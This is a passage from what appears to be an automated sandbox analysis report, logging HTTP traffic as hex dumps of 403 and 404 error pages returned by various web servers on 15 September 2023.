67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Fri, 15 Sep 2023 05:28:16 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: uk9QzH3w/yFDSSdiaData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 15 Sep 2023 05:28:17 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 15 Sep 2023 05:28:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 14003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mEge0y31SouIlLaVPAh52l%2F9QvcebEyyUW5AA6m8YuQikmhGpMzNIOELtSKVE1hozglUYGPaHS%2FVfv7GShwaH94NYlFtuqyB%2FkiaFxKGh8gqE0Ew5FxTNw8EuTgJvEQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e771fe8bc4257-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:28:17 GMTContent-Type: text/htmlContent-Length: 75193Connection: keep-aliveVary: Accept-EncodingETag: "61e91823-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 2d 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 15 Sep 2023 05:28:18 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Fri, 15 Sep 2023 05:28:17 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: hD1sCTHG/y7vFMQ7tData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 15 Sep 2023 05:28:17 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:27:49 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 